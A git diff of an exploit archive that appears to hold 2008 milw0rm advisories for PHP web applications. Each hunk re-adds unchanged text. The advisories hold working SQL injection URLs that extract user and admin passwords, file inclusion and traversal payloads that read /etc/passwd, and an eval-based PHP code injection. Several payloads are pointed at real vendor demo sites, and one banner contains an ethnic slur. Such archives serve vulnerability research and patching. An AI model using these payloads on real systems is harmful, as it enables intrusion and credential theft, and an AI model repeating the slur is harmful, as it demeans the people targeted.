b/platforms/php/webapps/6596.txt 
@@ -1,33 +1,33 @@ -E-Uploader Pro <= 1.0 SQL Injection Vulnerability - -Author: ~!Dok_tOR!~ -Date found: 26.08.08 -Product: E-Uploader Pro -Version: 1.0 -Price: $49 -URL: www.scriptsfrenzy.com -Download script: http://rapidshare.com/files/18285945/E-UploaderPro.PHP.NULL-DGT_license.zip -Vulnerability Class: SQL Injection -Condition: magic_quotes_gpc = Off - -Exploit 1: - -http://localhost/[installdir]/browser.php?view='+union+select+1,concat_ws(0x3a,user,pass),3,4,5,6,7+from+users/* - -Exploit 2: - -http://localhost/[installdir]/browser.php?view='+union+select+1,concat_ws(0x3a,admin_user,admin_pass),3,4,5,6,7+from+settings/* - -Adminka: - -http://localhost/[installdir]/admin.php - - -http://localhost/[installdir]/img.php?id='+union+select+1,2,user()/* -http://localhost/[installdir]/file.php?id='+union+select+1,2,3/* -http://localhost/[installdir]/mail.php?id='+union+select+1,2,3/* -http://localhost/[installdir]/thumb.php?id='+union+select+1,2,user()/* -http://localhost/[installdir]/zip.php?id='+union+select+1,2,3/* -http://localhost/[installdir]/zipit.php?id='+union+select+1,2,3,4,5,6,7/* - -# milw0rm.com [2008-09-27] +E-Uploader Pro <= 1.0 SQL Injection Vulnerability + +Author: ~!Dok_tOR!~ +Date found: 26.08.08 +Product: E-Uploader Pro +Version: 1.0 +Price: $49 +URL: www.scriptsfrenzy.com +Download script: http://rapidshare.com/files/18285945/E-UploaderPro.PHP.NULL-DGT_license.zip +Vulnerability Class: SQL Injection +Condition: magic_quotes_gpc = Off + +Exploit 1: + +http://localhost/[installdir]/browser.php?view='+union+select+1,concat_ws(0x3a,user,pass),3,4,5,6,7+from+users/* + +Exploit 2: + +http://localhost/[installdir]/browser.php?view='+union+select+1,concat_ws(0x3a,admin_user,admin_pass),3,4,5,6,7+from+settings/* + +Adminka: + +http://localhost/[installdir]/admin.php + + +http://localhost/[installdir]/img.php?id='+union+select+1,2,user()/* +http://localhost/[installdir]/file.php?id='+union+select+1,2,3/* 
+http://localhost/[installdir]/mail.php?id='+union+select+1,2,3/* +http://localhost/[installdir]/thumb.php?id='+union+select+1,2,user()/* +http://localhost/[installdir]/zip.php?id='+union+select+1,2,3/* +http://localhost/[installdir]/zipit.php?id='+union+select+1,2,3,4,5,6,7/* + +# milw0rm.com [2008-09-27] diff --git a/platforms/php/webapps/6598.txt b/platforms/php/webapps/6598.txt index 9275b8dc6..7d003d929 100755 --- a/platforms/php/webapps/6598.txt +++ b/platforms/php/webapps/6598.txt 
@@ -1,27 +1,27 @@ -************************************************************************************** - -Author : By DaRkLiFe -Greetz : str0ke & S.VV.A.T. - -************************************************************************************** -Script : The Concord Asset, Software, and Ticket system(CoAST) 0.95 Remote File Inclusion Vulnerability - -Download :http://downloads.sourceforge.net/coastal/coast-0.95.tgz?modtime=1222363198&big_mirror=0 - -************************************************************************************** - -Exploit : Site.com/script_path/coast/header.php?sections_file=Shellz? - - -************************************************************************************** - -The header.php.dist file exists and it has to be renamed into header.php as given in instructions. - -Vulberable : line 201 : - -************************************************************************************** - -THANKS ! GREETZ ! -************************************************************************************** - -# milw0rm.com [2008-09-27] +************************************************************************************** + +Author : By DaRkLiFe +Greetz : str0ke & S.VV.A.T. + +************************************************************************************** +Script : The Concord Asset, Software, and Ticket system(CoAST) 0.95 Remote File Inclusion Vulnerability + +Download :http://downloads.sourceforge.net/coastal/coast-0.95.tgz?modtime=1222363198&big_mirror=0 + +************************************************************************************** + +Exploit : Site.com/script_path/coast/header.php?sections_file=Shellz? + + +************************************************************************************** + +The header.php.dist file exists and it has to be renamed into header.php as given in instructions. + +Vulberable : line 201 : + +************************************************************************************** + +THANKS ! GREETZ ! 
+************************************************************************************** + +# milw0rm.com [2008-09-27] diff --git a/platforms/php/webapps/6601.txt b/platforms/php/webapps/6601.txt index bbd310206..906809ddf 100755 --- a/platforms/php/webapps/6601.txt +++ b/platforms/php/webapps/6601.txt 
@@ -1,40 +1,39 @@ - - :::::::-. ... ::::::. :::. - ;;, `';, ;; ;;;`;;;;, `;;; - `[[ [[[[' [[[ [[[[[. '[[ - $$, $$$$ $$$ $$$ "Y$c$$ - 888_,o8P'88 .d888 888 Y88 - MMMMP"` "YmmMMMM"" MMM YM - - [ Discovered by dun \ dun[at]strcpy.pl ] - - ############################################################### - # [ LnBlog <= 0.9.0 ] Local File Inclusion Vulnerability # - ############################################################### - # - # Script: "LnBlog A cross-platform, file-based weblog/mini-CMS." - # - # Script site: http://lnblog.skepticats.com/ - # Download: http://lnblog.skepticats.com/content/download/ - # http://sourceforge.net/projects/lnblog/ - # - # Vuln: http://site.com/[lnblog-0.9.0]/pages/showblog.php?plugin=../../../../../../../etc/passwd%00 - # - # - # Bug: ./lnblog-0.9.0/pages/showblog.php (lines: 109,110) - # - # ... - # } elseif ( isset($_GET['plugin']) ) { - # require_once("plugins/".$_GET['plugin'].".php"); - # ... - # - # - ############################################### - # Greetz: D3m0n_DE * str0ke * and otherz.. - ############################################### - - [ dun / 2008 ] - -******************************************************************************************* - -# milw0rm.com [2008-09-27] + :::::::-. ... ::::::. :::. + ;;, `';, ;; ;;;`;;;;, `;;; + `[[ [[[[' [[[ [[[[[. '[[ + $$, $$$$ $$$ $$$ "Y$c$$ + 888_,o8P'88 .d888 888 Y88 + MMMMP"` "YmmMMMM"" MMM YM + + [ Discovered by dun \ dun[at]strcpy.pl ] + + ############################################################### + # [ LnBlog <= 0.9.0 ] Local File Inclusion Vulnerability # + ############################################################### + # + # Script: "LnBlog A cross-platform, file-based weblog/mini-CMS." 
+ # + # Script site: http://lnblog.skepticats.com/ + # Download: http://lnblog.skepticats.com/content/download/ + # http://sourceforge.net/projects/lnblog/ + # + # Vuln: http://site.com/[lnblog-0.9.0]/pages/showblog.php?plugin=../../../../../../../etc/passwd%00 + # + # + # Bug: ./lnblog-0.9.0/pages/showblog.php (lines: 109,110) + # + # ... + # } elseif ( isset($_GET['plugin']) ) { + # require_once("plugins/".$_GET['plugin'].".php"); + # ... + # + # + ############################################### + # Greetz: D3m0n_DE * str0ke * and otherz.. + ############################################### + + [ dun / 2008 ] + +******************************************************************************************* + +# milw0rm.com [2008-09-27] diff --git a/platforms/php/webapps/6602.txt b/platforms/php/webapps/6602.txt index 5f26a6964..ecf04f2fe 100755 --- a/platforms/php/webapps/6602.txt +++ b/platforms/php/webapps/6602.txt 
@@ -1,42 +1,41 @@ - - :::::::-. ... ::::::. :::. - ;;, `';, ;; ;;;`;;;;, `;;; - `[[ [[[[' [[[ [[[[[. '[[ - $$, $$$$ $$$ $$$ "Y$c$$ - 888_,o8P'88 .d888 888 Y88 - MMMMP"` "YmmMMMM"" MMM YM - - [ Discovered by dun \ dun[at]strcpy.pl ] - - ############################################################## - # [ PlugSpace v0.1 ] Local File Inclusion Vulnerability # - ############################################################## - # - # Download: http://sourceforge.net/projects/plugspace/ - # - # Vuln: http://site.com/[plugspace]/index.php?navi=../../../../../../../etc/passwd%00 - # - # - # Bug: ./plugspace/index.php (lines: 64-81) - # - # ... - # 64: if (!isset($_GET['navi'])) - # 65: { - # ... - # 77: } - # 78: else - # 79: { - # 80: include("plugins/".$_GET['navi']."/main.php"); // LFI - # 81: } - # ... - # - # - ############################################### - # Greetz: D3m0n_DE * str0ke * and otherz.. - ############################################### - - [ dun / 2008 ] - -******************************************************************************************* - -# milw0rm.com [2008-09-27] + :::::::-. ... ::::::. :::. + ;;, `';, ;; ;;;`;;;;, `;;; + `[[ [[[[' [[[ [[[[[. '[[ + $$, $$$$ $$$ $$$ "Y$c$$ + 888_,o8P'88 .d888 888 Y88 + MMMMP"` "YmmMMMM"" MMM YM + + [ Discovered by dun \ dun[at]strcpy.pl ] + + ############################################################## + # [ PlugSpace v0.1 ] Local File Inclusion Vulnerability # + ############################################################## + # + # Download: http://sourceforge.net/projects/plugspace/ + # + # Vuln: http://site.com/[plugspace]/index.php?navi=../../../../../../../etc/passwd%00 + # + # + # Bug: ./plugspace/index.php (lines: 64-81) + # + # ... + # 64: if (!isset($_GET['navi'])) + # 65: { + # ... + # 77: } + # 78: else + # 79: { + # 80: include("plugins/".$_GET['navi']."/main.php"); // LFI + # 81: } + # ... + # + # + ############################################### + # Greetz: D3m0n_DE * str0ke * and otherz.. 
+ ############################################### + + [ dun / 2008 ] + +******************************************************************************************* + +# milw0rm.com [2008-09-27] diff --git a/platforms/php/webapps/6603.txt b/platforms/php/webapps/6603.txt index 21a1d6612..0862778db 100755 --- a/platforms/php/webapps/6603.txt +++ b/platforms/php/webapps/6603.txt 
@@ -1,55 +1,55 @@ -################################################################ -# .___ __ _______ .___ # -# __| _/____ _______| | __ ____ \ _ \ __| _/____ # -# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # -# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # -# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # -# \/ \/ \/ # -# ___________ ______ _ __ # -# _/ ___\_ __ \_/ __ \ \/ \/ / # -# \ \___| | \/\ ___/\ / # -# \___ >__| \___ >\/\_/ # -# est.2007 \/ \/ forum.darkc0de.com # -################################################################ -# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu # -#-Marezzi-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz # -# and all darkc0de and NikTrix members ---# -################################################################ -# -# Author: r45c4l -# -# Home : www.darkc0de.com & niktrix.info -# -# Email : r45c4l@hotmail.com -# -# Share the c0de! -# -################################################################ -# -# Title: MyCard script 1.0.2 (gallery.php?id) SQL Injection -# -# VEndor: http://www.tufat.com/s_business_card_designer.htm -# -# -########################################################### -# -# d0rk: Powered by MyCard -# -########################################################### - - POC :- - - http://www.site.com/[path]/gallery.php?id=-1+union+select+1,concat(login_id,0x3a,login_pass),2,3+from+pcard_user/* - - Live Demo: - - For live demo first go here : http://demo.tufat.com/mycard/index.php and register and then u can test like this : - - http://demo.tufat.com/mycard/gallery.php?id=-1+union+select+1,concat(login_id,0x3a,login_pass),2,3+from+pcard_user/* - -########################################################### -# -# Bug discovered : 28 Sep.2008 -########################################################### - -# milw0rm.com [2008-09-27] +################################################################ +# .___ __ _______ .___ # +# __| _/____ _______| | __ ____ \ _ \ __| _/____ # +# / 
__ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # +# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # +# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # +# \/ \/ \/ # +# ___________ ______ _ __ # +# _/ ___\_ __ \_/ __ \ \/ \/ / # +# \ \___| | \/\ ___/\ / # +# \___ >__| \___ >\/\_/ # +# est.2007 \/ \/ forum.darkc0de.com # +################################################################ +# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu # +#-Marezzi-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz # +# and all darkc0de and NikTrix members ---# +################################################################ +# +# Author: r45c4l +# +# Home : www.darkc0de.com & niktrix.info +# +# Email : r45c4l@hotmail.com +# +# Share the c0de! +# +################################################################ +# +# Title: MyCard script 1.0.2 (gallery.php?id) SQL Injection +# +# VEndor: http://www.tufat.com/s_business_card_designer.htm +# +# +########################################################### +# +# d0rk: Powered by MyCard +# +########################################################### + + POC :- + + http://www.site.com/[path]/gallery.php?id=-1+union+select+1,concat(login_id,0x3a,login_pass),2,3+from+pcard_user/* + + Live Demo: + + For live demo first go here : http://demo.tufat.com/mycard/index.php and register and then u can test like this : + + http://demo.tufat.com/mycard/gallery.php?id=-1+union+select+1,concat(login_id,0x3a,login_pass),2,3+from+pcard_user/* + +########################################################### +# +# Bug discovered : 28 Sep.2008 +########################################################### + +# milw0rm.com [2008-09-27] diff --git a/platforms/php/webapps/6604.txt b/platforms/php/webapps/6604.txt index e53c4e134..9fa8b5819 100755 --- a/platforms/php/webapps/6604.txt +++ b/platforms/php/webapps/6604.txt 
@@ -1,55 +1,55 @@ -################################################################ -# .___ __ _______ .___ # -# __| _/____ _______| | __ ____ \ _ \ __| _/____ # -# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # -# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # -# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # -# \/ \/ \/ # -# ___________ ______ _ __ # -# _/ ___\_ __ \_/ __ \ \/ \/ / # -# \ \___| | \/\ ___/\ / # -# \___ >__| \___ >\/\_/ # -# est.2007 \/ \/ forum.darkc0de.com # -################################################################ -# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu # -#-Marezzi-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz # -# and all darkc0de and NikTrix members ---# -################################################################ -# -# Author: r45c4l -# -# Home : www.darkc0de.com & niktrix.info -# -# Email : r45c4l@hotmail.com -# -# Share the c0de! -# -################################################################ -# -# Title: PowerPortal 2 Local Directory Traversal Vulnerability -# -# VEndor: http://www.powerportal2.com/ -# -# -########################################################### -# -# d0rk: n/a -# -########################################################### - - POC :- - - http://site.com/index/Gallery/?path=../../../../../../../ - - Live Demo: - - http://demo.powerportal2.com/index/Gallery/?path=../../../../../../../ - - http://demo.powerportal2.com/index/Gallery/?path=../../../../../../../dev - -########################################################### -# -# Bug discovered : 28 Sep.2008 -########################################################### - -# milw0rm.com [2008-09-27] +################################################################ +# .___ __ _______ .___ # +# __| _/____ _______| | __ ____ \ _ \ __| _/____ # +# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # +# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # +# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # +# \/ \/ \/ 
# +# ___________ ______ _ __ # +# _/ ___\_ __ \_/ __ \ \/ \/ / # +# \ \___| | \/\ ___/\ / # +# \___ >__| \___ >\/\_/ # +# est.2007 \/ \/ forum.darkc0de.com # +################################################################ +# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu # +#-Marezzi-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz # +# and all darkc0de and NikTrix members ---# +################################################################ +# +# Author: r45c4l +# +# Home : www.darkc0de.com & niktrix.info +# +# Email : r45c4l@hotmail.com +# +# Share the c0de! +# +################################################################ +# +# Title: PowerPortal 2 Local Directory Traversal Vulnerability +# +# VEndor: http://www.powerportal2.com/ +# +# +########################################################### +# +# d0rk: n/a +# +########################################################### + + POC :- + + http://site.com/index/Gallery/?path=../../../../../../../ + + Live Demo: + + http://demo.powerportal2.com/index/Gallery/?path=../../../../../../../ + + http://demo.powerportal2.com/index/Gallery/?path=../../../../../../../dev + +########################################################### +# +# Bug discovered : 28 Sep.2008 +########################################################### + +# milw0rm.com [2008-09-27] diff --git a/platforms/php/webapps/6605.txt b/platforms/php/webapps/6605.txt index b59cbd038..0f958b109 100755 --- a/platforms/php/webapps/6605.txt +++ b/platforms/php/webapps/6605.txt 
@@ -1,56 +1,56 @@ - || || | || - o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, - ( : / (_) / ( . -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| -| _ __ __ __ ______ | -| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | -| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | -| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | -| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | -| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | -| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | -| \ \____/ >> Kings of injection | -| \/___/ | -| | -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| - - - - -<> Found by : Cyb3r-1sT - -<> C0ntact : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at] yahoo.com - -<> Groups : InjEctOr5 T3am - - -======================================================= -+++++++++++++ R3membeR Kings of injection +++++++++++++ -======================================================= - - -<<->> script : PHP-Lance v1.52 - -<<->> Demo site : www.scriptdemo.com/php-lance - - -======================================================= -++++++++++++++++ pWning israel fuckers ++++++++++++++++ -======================================================= - - -<<->> D0rk : N0-WaY - -<<->> Exploit : - - >>>> www.site.me/patch/show.php?catid=-9999'+union+select+concat(user(),0x3a,database(),0x3a,version())/* - -======================================================= -+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++ -======================================================= - -<<->> InjEctOr5 TeaM - -<<->> All freind and All muslims - -# milw0rm.com [2008-09-27] + || || | || + o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, + ( : / (_) / ( . 
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| +| _ __ __ __ ______ | +| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | +| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | +| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | +| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | +| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | +| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | +| \ \____/ >> Kings of injection | +| \/___/ | +| | +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| + + + + +<> Found by : Cyb3r-1sT + +<> C0ntact : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at] yahoo.com + +<> Groups : InjEctOr5 T3am + + +======================================================= ++++++++++++++ R3membeR Kings of injection +++++++++++++ +======================================================= + + +<<->> script : PHP-Lance v1.52 + +<<->> Demo site : www.scriptdemo.com/php-lance + + +======================================================= +++++++++++++++++ pWning israel fuckers ++++++++++++++++ +======================================================= + + +<<->> D0rk : N0-WaY + +<<->> Exploit : + + >>>> www.site.me/patch/show.php?catid=-9999'+union+select+concat(user(),0x3a,database(),0x3a,version())/* + +======================================================= ++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++ +======================================================= + +<<->> InjEctOr5 TeaM + +<<->> All freind and All muslims + +# milw0rm.com [2008-09-27] diff --git a/platforms/php/webapps/6606.txt b/platforms/php/webapps/6606.txt index 0811ad5a5..9686ab7aa 100755 --- a/platforms/php/webapps/6606.txt +++ b/platforms/php/webapps/6606.txt 
@@ -1,66 +1,65 @@ - - :::::::-. ... ::::::. :::. - ;;, `';, ;; ;;;`;;;;, `;;; - `[[ [[[[' [[[ [[[[[. '[[ - $$, $$$$ $$$ $$$ "Y$c$$ - 888_,o8P'88 .d888 888 Y88 - MMMMP"` "YmmMMMM"" MMM YM - - [ Discovered by dun \ dun[at]strcpy.pl ] - - ############################################################### - # [ Yoxel <= 1.23beta ] PHP code Injection Vulnerability # - ############################################################### - # - # Script: "Yoxel is a hidden gem. This Open Source project provides customer/business focused Agile Product Management tools in PHP." - # - # Script site: http://www.yoxel.com/ - # Download: http://sourceforge.net/projects/yoxel/ - # - # Vuln: - # http://site.com/[yoxel_v1.23beta]/itpm/itpm_estimate.php?a=LOCAL_OR_REMOTE_FILE&rid=1&proj_id=);include($_GET[a]);die(2 - # http://site.com/[yoxel_v1.23beta]/itpm/itpm_estimate.php?a=LOCAL_OR_REMOTE_FILE&proj_id=);include($_GET[a]);die(2 - # - # - # (1) Bug: ./yoxel_v1.23beta/itpm/itpm_estimate.php (line: 40) - # - # ... - # require_once('includes/project/estimate_inc.php'); - # ... - # - # - # (2) Bug: ./yoxel_v1.23beta/includes/project/estimate_inc.php (lines: 85-99) - # - # ... - # if(isset($_GET['rid'])){ - # $rids=explode(':',$_GET['rid']); - # if(isset($_GET['proj_id']) && $_GET['proj_id']){ - # $proj_id=$_GET['proj_id']; - # eval("\$pps= new $cname(".$_GET['proj_id'].");"); // PHP inj 1 - # } - # }elseif(isset($_GET['proj_id']) && !empty($_GET['proj_id'])){ - # $proj_id=$_GET['proj_id']; - # - # if(isset($_GET['pr_list_type'])) - # $plt=$_GET['pr_list_type']; - # else - # $plt='full'; - # - # eval("\$pps= new $cname($proj_id);"); // PHP inj 2 - # ... - # - # - # After php injection: eval( $pps= new ITPlan();include('/etc/passwd');die(2); ); - # - # IMPORTANT: This bug doesn't work, when you aren't logged in Yoxel ;((( - # - # - ############################################### - # Greetz: D3m0n_DE * str0ke * and otherz.. 
- ############################################### - - [ dun / 2008 ] - -******************************************************************************************* - -# milw0rm.com [2008-09-27] + :::::::-. ... ::::::. :::. + ;;, `';, ;; ;;;`;;;;, `;;; + `[[ [[[[' [[[ [[[[[. '[[ + $$, $$$$ $$$ $$$ "Y$c$$ + 888_,o8P'88 .d888 888 Y88 + MMMMP"` "YmmMMMM"" MMM YM + + [ Discovered by dun \ dun[at]strcpy.pl ] + + ############################################################### + # [ Yoxel <= 1.23beta ] PHP code Injection Vulnerability # + ############################################################### + # + # Script: "Yoxel is a hidden gem. This Open Source project provides customer/business focused Agile Product Management tools in PHP." + # + # Script site: http://www.yoxel.com/ + # Download: http://sourceforge.net/projects/yoxel/ + # + # Vuln: + # http://site.com/[yoxel_v1.23beta]/itpm/itpm_estimate.php?a=LOCAL_OR_REMOTE_FILE&rid=1&proj_id=);include($_GET[a]);die(2 + # http://site.com/[yoxel_v1.23beta]/itpm/itpm_estimate.php?a=LOCAL_OR_REMOTE_FILE&proj_id=);include($_GET[a]);die(2 + # + # + # (1) Bug: ./yoxel_v1.23beta/itpm/itpm_estimate.php (line: 40) + # + # ... + # require_once('includes/project/estimate_inc.php'); + # ... + # + # + # (2) Bug: ./yoxel_v1.23beta/includes/project/estimate_inc.php (lines: 85-99) + # + # ... + # if(isset($_GET['rid'])){ + # $rids=explode(':',$_GET['rid']); + # if(isset($_GET['proj_id']) && $_GET['proj_id']){ + # $proj_id=$_GET['proj_id']; + # eval("\$pps= new $cname(".$_GET['proj_id'].");"); // PHP inj 1 + # } + # }elseif(isset($_GET['proj_id']) && !empty($_GET['proj_id'])){ + # $proj_id=$_GET['proj_id']; + # + # if(isset($_GET['pr_list_type'])) + # $plt=$_GET['pr_list_type']; + # else + # $plt='full'; + # + # eval("\$pps= new $cname($proj_id);"); // PHP inj 2 + # ... 
+ # + # + # After php injection: eval( $pps= new ITPlan();include('/etc/passwd');die(2); ); + # + # IMPORTANT: This bug doesn't work, when you aren't logged in Yoxel ;((( + # + # + ############################################### + # Greetz: D3m0n_DE * str0ke * and otherz.. + ############################################### + + [ dun / 2008 ] + +******************************************************************************************* + +# milw0rm.com [2008-09-27] diff --git a/platforms/php/webapps/6607.txt b/platforms/php/webapps/6607.txt index fc0641780..dde20f021 100755 --- a/platforms/php/webapps/6607.txt +++ b/platforms/php/webapps/6607.txt 
@@ -1,23 +1,23 @@ -------------------------------------------------------------------------- - -- JIKI Team [ JIKO + KIl1er + merwan-neo ] --- -------------------------------------------------------------------------- -# Author : jiko -# email : jalikom@hotmail.com -# Home : www.no-exploit.Com -# Script : X7 Chat Version 2.0.1 -# Bug : Local File Inclusion Vulnerability -=========================JIkI Team=================== -# Exploit : - - http://localhost/[script]/help/mini.php?help_file=[file] -=========================JIKI Team=================== - greetz : all my friend and all No-back members and tryag.Com Gold_M - Cochlain , Hcj , Hassin X , all muslims - visit: www.no-back.org & www.tryag.com & ==> www.no-exploit.Com -------------------------------------------------------------------------- - -- JIKI Team [ JIKO + KIl1er ] -- -------------------------------------------------------------------------- -------== troops of Mohamed comming inchalah =----------------- -Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc - -# milw0rm.com [2008-09-27] +------------------------------------------------------------------------- + -- JIKI Team [ JIKO + KIl1er + merwan-neo ] --- +------------------------------------------------------------------------- +# Author : jiko +# email : jalikom@hotmail.com +# Home : www.no-exploit.Com +# Script : X7 Chat Version 2.0.1 +# Bug : Local File Inclusion Vulnerability +=========================JIkI Team=================== +# Exploit : + + http://localhost/[script]/help/mini.php?help_file=[file] +=========================JIKI Team=================== + greetz : all my friend and all No-back members and tryag.Com Gold_M + Cochlain , Hcj , Hassin X , all muslims + visit: www.no-back.org & www.tryag.com & ==> www.no-exploit.Com +------------------------------------------------------------------------- + -- JIKI Team [ JIKO + KIl1er ] -- +------------------------------------------------------------------------- +------== troops of Mohamed 
comming inchalah =----------------- +Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc + +# milw0rm.com [2008-09-27] diff --git a/platforms/php/webapps/6608.txt b/platforms/php/webapps/6608.txt index 88155ea6a..41963e5c9 100755 --- a/platforms/php/webapps/6608.txt +++ b/platforms/php/webapps/6608.txt 
@@ -1,62 +1,62 @@ -|___________________________________________________| -| -| ZEELYRICS v2.0 (bannerclick.php adid) Remote SQL Injection Vulnerability -| -|___________________________________________________ -|---------------------Hussin X----------------------| -| -| Author: Hussin X -| -| Home : IQ-SecuritY > www.IQ-tY.com -| -| email: darkangel_g85[at]Yahoo[DoT]com -| -| -|___________________________________________________ -| | -| -| script http://zeeways.com/main/products/ZEELYRICS-v2.0.html -| -|___________________________________________________| - -Exploit: -________ - - - -www.[target].com/Script/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin-- - - - - -L!VE DEMO: -_________ - - -http://www.zeelyrics.com/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin-- - - - - - -___________________ - - -Admin LogiN : - -www.[target].com/Script/admin/ - - -____________________________( Greetz )_________________________________ -| -| All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC | -| -| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr -| -| FAHD | Iraqihack | str0ke | Cyber-Zone -|_____________________________________________________________________ - - - Im IRAQi - -# milw0rm.com [2008-09-28] +|___________________________________________________| +| +| ZEELYRICS v2.0 (bannerclick.php adid) Remote SQL Injection Vulnerability +| +|___________________________________________________ +|---------------------Hussin X----------------------| +| +| Author: Hussin X +| +| Home : IQ-SecuritY > www.IQ-tY.com +| +| email: darkangel_g85[at]Yahoo[DoT]com +| +| +|___________________________________________________ +| | +| +| script http://zeeways.com/main/products/ZEELYRICS-v2.0.html +| +|___________________________________________________| + +Exploit: +________ + + + +www.[target].com/Script/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin-- + + + + +L!VE 
DEMO: +_________ + + +http://www.zeelyrics.com/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin-- + + + + + +___________________ + + +Admin LogiN : + +www.[target].com/Script/admin/ + + +____________________________( Greetz )_________________________________ +| +| All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC | +| +| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr +| +| FAHD | Iraqihack | str0ke | Cyber-Zone +|_____________________________________________________________________ + + + Im IRAQi + +# milw0rm.com [2008-09-28] diff --git a/platforms/php/webapps/6611.php b/platforms/php/webapps/6611.php index 782f09feb..c999bad7c 100755 --- a/platforms/php/webapps/6611.php +++ b/platforms/php/webapps/6611.php @@ -1,48 +1,48 @@ -#!/usr/bin/php -q - - -# milw0rm.com [2008-09-28] +#!/usr/bin/php -q + + +# milw0rm.com [2008-09-28] diff --git a/platforms/php/webapps/6612.txt b/platforms/php/webapps/6612.txt index 95a0bf42b..6d90cba5f 100755 --- a/platforms/php/webapps/6612.txt +++ b/platforms/php/webapps/6612.txt 
@@ -1,18 +1,18 @@
-Author: ~!Dok_tOR!~
-Date found: 28.09.08
-Product: Pro Chat Rooms
-Version: 3.0.3
-Price: $55
-URL: www.prochatrooms.com
-Vulnerability Class: SQL Injection
-Condition: magic_quotes_gpc = Off
-
-Exploit 1:
-
-http://localhost/[installdir]/profiles/index.php?gud=-1'+union+select+1,concat_ws(0x3a,user_name,password,email),3,4,5,6,7,8+from+prochatrooms_users/*
-
-Exploit 2:
-
-http://localhost/[installdir]/profiles/admin.php?gud=-1'+union+select+1,concat_ws(0x3a,user_name,password,email),3,4,5,6,7,8+from+prochatrooms_users/*
-
-# milw0rm.com [2008-09-28]
+Author: ~!Dok_tOR!~
+Date found: 28.09.08
+Product: Pro Chat Rooms
+Version: 3.0.3
+Price: $55
+URL: www.prochatrooms.com
+Vulnerability Class: SQL Injection
+Condition: magic_quotes_gpc = Off
+
+Exploit 1:
+
+http://localhost/[installdir]/profiles/index.php?gud=-1'+union+select+1,concat_ws(0x3a,user_name,password,email),3,4,5,6,7,8+from+prochatrooms_users/*
+
+Exploit 2:
+
+http://localhost/[installdir]/profiles/admin.php?gud=-1'+union+select+1,concat_ws(0x3a,user_name,password,email),3,4,5,6,7,8+from+prochatrooms_users/*
+
+# milw0rm.com [2008-09-28]
diff --git a/platforms/php/webapps/6613.txt b/platforms/php/webapps/6613.txt
index e287bd4f5..059ebb0ae 100755
--- a/platforms/php/webapps/6613.txt
+++ b/platforms/php/webapps/6613.txt
